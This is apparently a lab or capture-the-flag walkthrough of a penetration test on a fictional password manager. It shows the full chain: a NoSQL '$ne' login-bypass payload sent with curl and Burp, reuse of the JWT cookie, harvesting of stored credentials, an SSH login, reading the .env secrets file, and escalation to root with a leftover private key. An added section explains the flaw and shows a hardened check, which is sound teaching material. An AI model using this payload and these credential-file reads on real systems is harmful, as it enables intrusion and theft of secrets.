Cyber Vault Lab
In light of the recent increase in cyber-attacks around the world, as a cybersecurity firm, you have been assigned to perform penetration testing on the systems of a company called ValkyrieDigital. Your task is to perform a vulnerability scan on the password management software used by the company and report your findings. Good luck!
What is the version number on the home page after logging in?
- First, scan the target with nmap:
┌─[root@hackerbox]─[~]
└──╼ #nmap -sV -sC passwise.valkyriedigital.hv
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-12-02 09:42 CST
Nmap scan report for passwise.valkyriedigital.hv (172.20.6.114)
Host is up (0.00038s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 72:f3:36:e3:82:44:5f:cc:af:1a:eb:ad:9d:c1:0f:5b (RSA)
| 256 74:97:ec:65:4f:3d:86:5e:dd:76:65:86:60:67:a8:c4 (ECDSA)
|_ 256 24:b2:a7:4a:6e:ea:75:ff:d4:af:ea:32:dd:2f:96:34 (ED25519)
80/tcp open http nginx 1.18.0
|_http-server-header: nginx/1.18.0
| http-title: Login - PassWise
|_Requested resource was /login
|_http-trane-info: Problem with XML parsing of /evox/about
MAC Address: 52:54:00:C9:91:6C (QEMU virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.43 seconds
- Then I tried SQL and NoSQL injection, and this payload succeeded:
{"email": {"$ne": ""}, "password": {"$ne": ""}}
- Use curl to send the payload:
curl -X POST http://passwise.valkyriedigital.hv/login \
-H "Content-Type: application/json" \
-d '{"email": {"$ne": ""}, "password": {"$ne": ""}}'
- Alternatively, Burp Suite can be used to send the request with the payload:
POST /login HTTP/1.1
Host: passwise.valkyriedigital.hv
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json
Content-Length: 49
Origin: http://passwise.valkyriedigital.hv
Connection: keep-alive
Referer: http://passwise.valkyriedigital.hv/login
Priority: u=0
{"email": {"$ne": ""}, "password": {"$ne": ""}}
- The result is:
HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Tue, 02 Dec 2025 15:49:37 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 55
Connection: keep-alive
X-Powered-By: Express
Set-Cookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOiI2NWRjODhjNGU4MmIwYzU0YjkxOWIyYWEiLCJpYXQiOjE3NjQ2OTA1NzcsImV4cCI6MTc2NDcwODU3N30.gUpTGE7rrqeq0sCemXWlyvVcfI83VFj3l7N3yLLq9Dk; Max-Age=18000; Path=/; Expires=Tue, 02 Dec 2025 20:49:37 GMT; HttpOnly
ETag: W/"37-zlcgX4RY9AaDEj8FY8NljYkMc0U"
{"status":"success","message":"Logged in successfully"}
- The response contains a JWT; use that JWT to log in to the target:
┌─[root@hackerbox]─[~]
└──╼ #curl -H "Cookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOiI2NWRjODhjNGU4MmIwYzU0YjkxOWIyYWEiLCJpYXQiOjE3NjQ2OTA1NzcsImV4cCI6MTc2NDcwODU3N30.gUpTGE7rrqeq0sCemXWlyvVcfI83VFj3l7N3yLLq9Dk" http://passwise.valkyriedigital.hv/ | grep "version"
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
<li>version 2.4.5</li>0 0 0 --:--:-- --:--:-- --:--:-- 0
100 12726 100 12726 0 0 1083k 0 --:--:-- --:--:-- --:--:-- 1129k
┌─[root@hackerbox]─[~]
└──╼ #
==> The Answer: 2.4.5
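The bypass above works because the Express handler splices the JSON body straight into a MongoDB filter, so `{"$ne": ""}` is interpreted as an operator rather than a literal credential. The following is an added example, not the PassWise code: a tiny in-memory stand-in for the `findOne` matcher (supporting only equality and `$ne`), the vulnerable login pattern beside a hardened one that rejects any non-string credential before a query is built. The sample user record is constructed.

```javascript
// Added example (not PassWise code): why {"$ne": ""} passes the login check
// and how strict type checking of req.body stops it before a query is built.
// The in-memory "collection" and matcher stand in for MongoDB; they implement
// only plain equality and the $ne operator that this write-up exercises.
const users = [ // constructed sample data, not the lab's database
  { email: "admin@valkyriedigital.hv", password: "constructed-sample-value" },
];

// Minimal stand-in for Mongo document matching.
function matches(doc, filter) {
  return Object.entries(filter).every(([field, cond]) => {
    if (cond !== null && typeof cond === "object" && "$ne" in cond) {
      return doc[field] !== cond.$ne; // {$ne: ""} matches every non-empty value
    }
    return doc[field] === cond;       // plain literal comparison
  });
}

function findOne(collection, filter) {
  return collection.find((doc) => matches(doc, filter)) || null;
}

// Vulnerable pattern: whatever the client sent becomes the filter value, so an
// object carrying an operator turns the equality check into "not equal to ''".
function vulnerableLogin(body) {
  const user = findOne(users, { email: body.email, password: body.password });
  return user !== null;
}

// Hardened pattern: credentials must be primitive strings. Operator objects are
// rejected up front, so nothing but a literal value can reach the database.
// (A real handler would also compare a password hash; the injection point is the
// query construction either way.)
function hardenedLogin(body) {
  if (typeof body.email !== "string" || typeof body.password !== "string") {
    return false; // rejects {"email": {"$ne": ""}, "password": {"$ne": ""}}
  }
  const user = findOne(users, { email: body.email, password: body.password });
  return user !== null;
}
```

The same check belongs on every field that is forwarded to a query, and libraries such as express-mongo-sanitize apply it globally by stripping `$`-prefixed keys from request bodies.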
What is the username and password of the server the website is running on?
- The username and password were already in the output from question 1:
┌─[root@hackerbox]─[~]
└──╼ #curl -H "Cookie: jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VySWQiOiI2NWRjODhjNGU4MmIwYzU0YjkxOWIyYWEiLCJpYXQiOjE3NjQ2OTA1NzcsImV4cCI6MTc2NDcwODU3N30.gUpTGE7rrqeq0sCemXWlyvVcfI83VFj3l7N3yLLq9Dk" http://passwise.valkyriedigital.hv/
<!DOCTYPE html>
<html lang="en" >
<head>
<meta charset="UTF-8">
<title>Dashboard - PassWise</title>
<link rel="stylesheet" href="/css/style.css">
<link rel="shortcut icon" href="/images/favicon.ico" type="image/x-icon">
</head>
<body>
<div class="bar">
<h1 href="#" class="logo">PassWise</h1>
<div class="alias">
<a href="javascript:" number="8" description="Collection">ITEMS</a>
<a href="javascript:" description="GENERATOR" class="generate">PASSWORD</a>
<a href="/logout" number="" class="out" description="Logout">LOGOUT</a>
</div>
</div>
<input class="search" type="search" id="search" size="15" placeholder="Type..." autocomplete="off">
<nav class="add_new">
<li class="new">new</li>
<li>version 2.4.5</li>
<span class="submen">
<li class="item">Item</li>
</span>
</nav>
<aside>
<div class="copier" style="display: none;">
<summary class="_item">
<a class="remove_summary"></a>
<section class="title">
<span>URL/Site/Host</span>
<span>Username/Email</span>
<span>Password</span>
<span>Notes</span>
</section>
<section class="kontenti" tipi="item">
<a class="remove_section"></a>
<span contenteditable="true" parent="URL/Site/Host" class="site">Click to edit</span>
<span contenteditable="true" parent="Username" class="username">Click to edit</span>
<span contenteditable="true" parent="Password" class="password">Click to edit</span>
<span contenteditable="true" parent="Other" class="other">Click to edit</span>
</section>
</summary>
</div>
<article style="display: none;" class="cloned">
<ul class="sin_opt">
<li class="tag">
<input type="checkbox" id="pr1">
<label for="pr1">Item</label>
</li>
<li class="edit">EDIT</li>
<li class="save_pdf">PDF</li>
<li class="deleteProject">Delete</li>
<li class="save saveajax">SAVE</li>
</ul>
<main number="01" contenteditable="true">Type the Item name</main>
<summary class="_item">
<a class="remove_summary"></a>
<section class="title">
<span>URL/Site/Host</span>
<span>Username</span>
<span>Password</span>
<span>Notes</span>
</section>
<section class="kontenti" tipi="item">
<a class="remove_section"></a>
<span contenteditable="true" parent="URL/Site/Host" class="site">Click to edit</span>
<span contenteditable="true" parent="Username" class="username">Click to edit</span>
<span contenteditable="true" parent="Password" class="password">Click to edit</span>
<span contenteditable="true" parent="Other" class="other">Click to edit</span>
</section>
</summary>
</article>
<article>
<ul class="sin_opt">
<li class="tag">
<input type="checkbox" id="pr2">
<label for="pr2">Item</label>
</li>
<li class="edit">EDIT</li>
<li class="save_pdf">PDF</li>
<li class="deleteProject">Delete</li>
<li class="save saveajax">SAVE</li>
</ul>
<main id="345" number="01" tag="items"><img src="/images/tag.png">Admin Panel</main>
<summary class="_item">
<a class="remove_summaryDB"></a>
<section class="title">
<span>URL/Site/Host</span>
<span>Username/Email</span>
<span>Password</span>
<span>Notes</span>
</section>
<section class="kontenti" tipi="item">
<a class="remove_sectionDB"></a>
<span parent="URL/Site/Host" class="site"></span>
<span parent="Username" class="username">admin</span>
<span parent="Password" class="password">9BNMFWwQ5SNeAc9</span>
<span parent="Other" class="other"></span>
</section>
</summary>
</article>
<article>
<ul class="sin_opt">
<li class="tag">
<input type="checkbox" id="pr2">
<label for="pr2">Item</label>
</li>
<li class="edit">EDIT</li>
<li class="save_pdf">PDF</li>
<li class="deleteProject">Delete</li>
<li class="save saveajax">SAVE</li>
</ul>
<main id="345" number="02" tag="items"><img src="/images/tag.png">Instagram</main>
<summary class="_item">
<a class="remove_summaryDB"></a>
<section class="title">
<span>URL/Site/Host</span>
<span>Username/Email</span>
<span>Password</span>
<span>Notes</span>
</section>
<section class="kontenti" tipi="item">
<a class="remove_sectionDB"></a>
<span parent="URL/Site/Host" class="site">instagram.com</span>
<span parent="Username" class="username">valkyrie_digitall</span>
<span parent="Password" class="password">VFhZpayAnkQR9aRS</span>
<span parent="Other" class="other"></span>
</section>
</summary>
</article>
<article>
<ul class="sin_opt">
<li class="tag">
<input type="checkbox" id="pr2">
<label for="pr2">Item</label>
</li>
<li class="edit">EDIT</li>
<li class="save_pdf">PDF</li>
<li class="deleteProject">Delete</li>
<li class="save saveajax">SAVE</li>
</ul>
<main id="345" number="03" tag="items"><img src="/images/tag.png">Support Panel</main>
<summary class="_item">
<a class="remove_summaryDB"></a>
<section class="title">
<span>URL/Site/Host</span>
<span>Username/Email</span>
<span>Password</span>
<span>Notes</span>
</section>
<section class="kontenti" tipi="item">
<a class="remove_sectionDB"></a>
<span parent="URL/Site/Host" class="site"></span>
<span parent="Username" class="username">support</span>
<span parent="Password" class="password">9BNMFWwQ5SNeAc9</span>
<span parent="Other" class="other"></span>
</section>
</summary>
</article>
<article>
<ul class="sin_opt">
<li class="tag">
<input type="checkbox" id="pr2">
<label for="pr2">Item</label>
</li>
<li class="edit">EDIT</li>
<li class="save_pdf">PDF</li>
<li class="deleteProject">Delete</li>
<li class="save saveajax">SAVE</li>
</ul>
<main id="345" number="05" tag="items"><img src="/images/tag.png">SSH Server</main>
<summary class="_item">
<a class="remove_summaryDB"></a>
<section class="title">
<span>URL/Site/Host</span>
<span>Username/Email</span>
<span>Password</span>
<span>Notes</span>
</section>
<section class="kontenti" tipi="item">
<a class="remove_sectionDB"></a>
<span parent="URL/Site/Host" class="site"></span>
<span parent="Username" class="username">sherpa</span>
<span parent="Password" class="password">7SnkaxtH7CqbcU</span>
<span parent="Other" class="other"></span>
</section>
</summary>
</article>
<article>
<ul class="sin_opt">
<li class="tag">
<input type="checkbox" id="pr2">
<label for="pr2">Item</label>
</li>
<li class="edit">EDIT</li>
<li class="save_pdf">PDF</li>
<li class="deleteProject">Delete</li>
<li class="save saveajax">SAVE</li>
</ul>
<main id="345" number="04" tag="items"><img src="/images/tag.png">Facebook</main>
<summary class="_item">
<a class="remove_summaryDB"></a>
<section class="title">
<span>URL/Site/Host</span>
<span>Username/Email</span>
<span>Password</span>
<span>Notes</span>
</section>
<section class="kontenti" tipi="item">
<a class="remove_sectionDB"></a>
<span parent="URL/Site/Host" class="site">facebook.com</span>
<span parent="Username" class="username">valkyrie_digitall</span>
<span parent="Password" class="password">wUGmzsx4gEg</span>
<span parent="Other" class="other"></span>
</section>
</summary>
</article>
<article>
<ul class="sin_opt">
<li class="tag">
<input type="checkbox" id="pr2">
<label for="pr2">Item</label>
</li>
<li class="edit">EDIT</li>
<li class="save_pdf">PDF</li>
<li class="deleteProject">Delete</li>
<li class="save saveajax">SAVE</li>
</ul>
<main id="345" number="06" tag="items"><img src="/images/tag.png">Twitter</main>
<summary class="_item">
<a class="remove_summaryDB"></a>
<section class="title">
<span>URL/Site/Host</span>
<span>Username/Email</span>
<span>Password</span>
<span>Notes</span>
</section>
<section class="kontenti" tipi="item">
<a class="remove_sectionDB"></a>
<span parent="URL/Site/Host" class="site">twitter.com</span>
<span parent="Username" class="username">valkyrie_digitall</span>
<span parent="Password" class="password">YXnkVgszHmUGhW8ZaWWkGCdA</span>
<span parent="Other" class="other"></span>
</section>
</summary>
</article>
<article>
<ul class="sin_opt">
<li class="tag">
<input type="checkbox" id="pr2">
<label for="pr2">Item</label>
</li>
<li class="edit">EDIT</li>
<li class="save_pdf">PDF</li>
<li class="deleteProject">Delete</li>
<li class="save saveajax">SAVE</li>
</ul>
<main id="345" number="07" tag="items"><img src="/images/tag.png">FTP Server</main>
<summary class="_item">
<a class="remove_summaryDB"></a>
<section class="title">
<span>URL/Site/Host</span>
<span>Username/Email</span>
<span>Password</span>
<span>Notes</span>
</section>
<section class="kontenti" tipi="item">
<a class="remove_sectionDB"></a>
<span parent="URL/Site/Host" class="site"></span>
<span parent="Username" class="username"></span>
<span parent="Password" class="password"></span>
<span parent="Other" class="other"></span>
</section>
</summary>
</article>
</aside>
<script src='/js/jquery.min.js'></script>
<script src="/js/script.js"></script>
</body>
</html>
┌─[root@hackerbox]─[~]
└──╼ #
- Username: sherpa
- Password: 7SnkaxtH7CqbcU
- I used them to connect over SSH:
┌─[root@hackerbox]─[~]
└──╼ #ssh sherpa@172.20.6.114
sherpa@172.20.6.114's password:
Linux debian 5.10.0-27-amd64 #1 SMP Debian 5.10.205-2 (2023-12-31) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
sherpa@debian:~$
==> The Answer: sherpa:7SnkaxtH7CqbcU
What is the database password?
sherpa@debian:~$ ls
passwise
sherpa@debian:~$ pwd
/home/sherpa
sherpa@debian:~$ cd *
sherpa@debian:~/passwise$ ls
controllers database.js index.js middleware models node_modules package.json package-lock.json routes static views
sherpa@debian:~/passwise$ ls -la
total 108
drwxr-xr-x 9 sherpa sherpa 4096 Feb 27 2024 .
drwxr-xr-x 5 sherpa sherpa 4096 Feb 27 2024 ..
drwxr-xr-x 2 sherpa sherpa 4096 Feb 26 2024 controllers
-rw-r--r-- 1 sherpa sherpa 346 Feb 26 2024 database.js
-rw-r--r-- 1 sherpa sherpa 120 Feb 27 2024 .env
-rwxr-xr-x 1 sherpa sherpa 788 Feb 27 2024 index.js
drwxr-xr-x 2 sherpa sherpa 4096 Feb 26 2024 middleware
drwxr-xr-x 2 sherpa sherpa 4096 Feb 26 2024 models
drwxr-xr-x 113 sherpa sherpa 4096 Feb 26 2024 node_modules
-rw-r--r-- 1 sherpa sherpa 414 Feb 26 2024 package.json
-rw-r--r-- 1 sherpa sherpa 54867 Feb 26 2024 package-lock.json
drwxr-xr-x 2 sherpa sherpa 4096 Feb 26 2024 routes
drwxr-xr-x 6 sherpa sherpa 4096 Feb 27 2024 static
drwxr-xr-x 2 sherpa sherpa 4096 Feb 27 2024 views
sherpa@debian:~/passwise$ cat .env
PORT = 9000
MONGODB_URI = mongodb://root:vhCZFwBaFqKtMbMshL4eYXvp@localhost:27017
JWT_SECRET = L96d9jbndy977Ws9hBWEDm2Ssherpa@debian:~/passwise$
sherpa@debian:~/passwise$
==> The Answer: root:vhCZFwBaFqKtMbMshL4eYXvp
What is the key value used for JWT (JSON Web Token)?
==> The Answer: L96d9jbndy977Ws9hBWEDm2S
What is the last terminal command run by the root user?
sherpa@debian:/home$ ls
root_id_rsa root_id_rsa.pub sherpa
sherpa@debian:/home$ chmod 600 root_id_rsa
sherpa@debian:/home$ ls -la
total 20
drwxr-xr-x 3 root root 4096 Feb 27 2024 .
drwxr-xr-x 18 root root 4096 Jan 14 2024 ..
-rw------- 1 sherpa sherpa 3369 Feb 27 2024 root_id_rsa
-rw------- 1 sherpa sherpa 737 Feb 27 2024 root_id_rsa.pub
drwxr-xr-x 6 sherpa sherpa 4096 Dec 2 11:26 sherpa
sherpa@debian:/home$ ssh -i root_id_rsa root:localhost
ssh: Could not resolve hostname root:localhost: Name or service not known
sherpa@debian:/home$ ssh -i root_id_rsa root@localhost
Linux debian 5.10.0-27-amd64 #1 SMP Debian 5.10.205-2 (2023-12-31) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Dec 2 11:31:16 2025 from ::1
root@debian:~# ls
root@debian:~# cd /root
root@debian:~# ls
root@debian:~# ls -la
total 28
drwx------ 4 root root 4096 Feb 27 2024 .
drwxr-xr-x 18 root root 4096 Jan 14 2024 ..
-rw------- 1 root root 52 Dec 2 11:31 .bash_history
-rw-r--r-- 1 root root 571 Apr 10 2021 .bashrc
drwxr-xr-x 3 root root 4096 Feb 26 2024 .local
-rw------- 1 root root 0 Feb 26 2024 .mongorc.js
-rw-r--r-- 1 root root 161 Jul 9 2019 .profile
drwx------ 2 root root 4096 Feb 27 2024 .ssh
root@debian:~# history
1 ifconfig
2 passwd sherpa
3 apt-get update
4 ls
5 cd /root
6 ls
7 ls -la
9 history
root@debian:~#
==> The Answer: apt-get update